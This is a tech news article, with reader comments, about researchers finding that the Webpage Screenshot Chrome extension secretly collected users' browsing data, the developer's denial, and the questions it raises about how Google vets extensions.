Maksim Kabakou - Fotolia

News Stay informed about the latest enterprise technology news and product updates.

Chrome security under fire from third-party extension

Security researchers say Webpage Screenshot, a popular third-party extension for Google Chrome, was secretly collecting end-user browsing data. Its true purpose and how Google missed it remain up for debate.

Webpage Screenshot, an add-on screen-capturing tool for Google Chrome, managed to bypass Google Inc.'s security controls and secretly collected users' browsing details without their knowledge, according to researchers, leading to new questions about the security of third-party Chrome extensions.

Researchers at Heimdal Security in Demark published a report on Webpage Screenshot this week and went so far as to call the popular extension "spyware." Yet when Webpage Screenshot, which has 1.2 million users, was released for use, it had not demonstrated any malicious behavior. According to Heimdal Security, its spyware capabilities were initiated a week later via download of additional code from the Web, which allowed the extension to collect data such as user's IP addresses, URLs visited, files and data loaded from URLs, search queries entered and even personal contact information.

"On the surface it all looks good: When you run it in the sandbox environment, it doesn't look like it does anything malicious," said Peter Kruse, founder of CSIS Security Group, which spun off Heimdal Security last year. "A time wait is usually a bad sign, because who would put a function like time wait into good code? You can use it as an indicator of a potential malicious thing."

The spyware functions of Webpage Screenshot were actually published separately on StopMalvertising a year ago. According to Kruse, the discovery was simply not picked up by media and the extension continued to collect and sell user browser data.

Swedish newspaper Dagens Nyheter (DN) reported on the popular extension this week when the malicious behavior was discovered by Sentor MSS, a security services firm based in Stockholm. The Swedish media spread this news to the Danish media, and it eventually landed in the Heimdal Security lab.

"We issued a warning as well," Kruse said, "because there was quite many [40,000] Danish users using this extension."

The warnings eventually led Google to remove the add-on from its Google Chrome Web Store earlier this week.

"It is against the Chrome Web Store Content Policies to distribute malware," a Google spokesperson wrote in an email to SearchSecurity. "When we detect items containing malware or learn of them through reports, we remove them from the Chrome Web Store and from active Chrome instances."

Primary purpose: Screenshots or data exfiltration?

During its research into Webpage Screenshot, Heimdal Security followed the registrant information on the extension's homepage to the developer: Aminadav Glickshein, a resident of Israel. According to Heimdal, Glickshein used a server in New York to redirect data transmitted by the app that included sensitive information.

"The primary purpose of this extension is not to provide a screenshot function," Kruse said. "That's actually kind of lame in the first place, because you have built-in screenshot functions."

Last year, Chrome instituted its Single Purpose Policy, requiring extensions to serve only a single purpose. Chrome extensions undergo testing for snooping and unwanted transmission of user browsing data -- the unwanted complications that led to this policy being instated.

"It's literally just a camouflage tool that has grown very large in popularity," Kruse said. "The real purpose [of the extension] was to extract a lot of traffic, a lot of data, and a lot of user behavior."

But Glickshein denies this. "Private data [was] never sent to any server," Glickshein said in an email to SearchSecurity. "Google removed [the extension] because of reporters."

Yet the DN newspaper reported it was in contact with "the owner" of Webpage Screenshot and that he told the newspaper that the aim of the extension was to "produce statistics on surfing behavior," which he called commercially valuable.

Chrome extension security

Despite the controversy surrounding Webpage Screenshot and the long-standing security issues with add-ons for all Web browsers, Kruse acknowledged Google is doing the best it can with Chrome extension security considering the many submissions that it receives. To some degree, he said, the end users need to trust the vendor whose application they are using. Asking Google to do a complete manual code review for every add-on, he noted, would be unfeasible.

"Obviously when you have to validate a lot of applications, a lot of extensions, in the day -- you need to automate that process," Kruse said. "And [if] you don't take into account that there are things that might sleep for a while or might include updating things from an external side, then there's bound to be a security risk."

But Kruse said Google could do more in the realm of vendor verification. He suggested implementing a Netflix-style star-based ratings system to gauge trust, with users who have been submitting quality code for a while earning more trust stars. He also recommended checking apps for sleep functions within its code, for which "even being creative" he could not come up with a legitimate use.

Next Steps

Find out if content-agnostic malware protection improves Chrome security

Dig Deeper on Malware, virus, Trojan and spyware protection and removal

Join the conversation

3 comments

Send me notifications when other members comment.

Please create a username to comment.

Should companies like Google do more to verify the security of third-party extensions?
Cancel
It’s easy to say of course they should. The real question is how should they do it? We’ve seen where Apple’s screening process is much less than advertised.
Cancel
This is quite interesting!  The entire point of a sandbox is to limit access to that sort of data.  The fact that a screenshot application could gain access to that data in the first place shows how the permissions are not fine grained enough.  Instead Google should have a way of saying 'no access to History, Bookmarks, etc." and only grant permission on extensions that need it.  This allows users to do a sanity test, asking the question, "Does it really need access to my history for taking a screenshot?"
Cancel

-ADS BY GOOGLE

SearchCloudSecurity

SearchNetworking

SearchCIO

SearchEnterpriseDesktop

SearchCloudComputing

ComputerWeekly.com

Close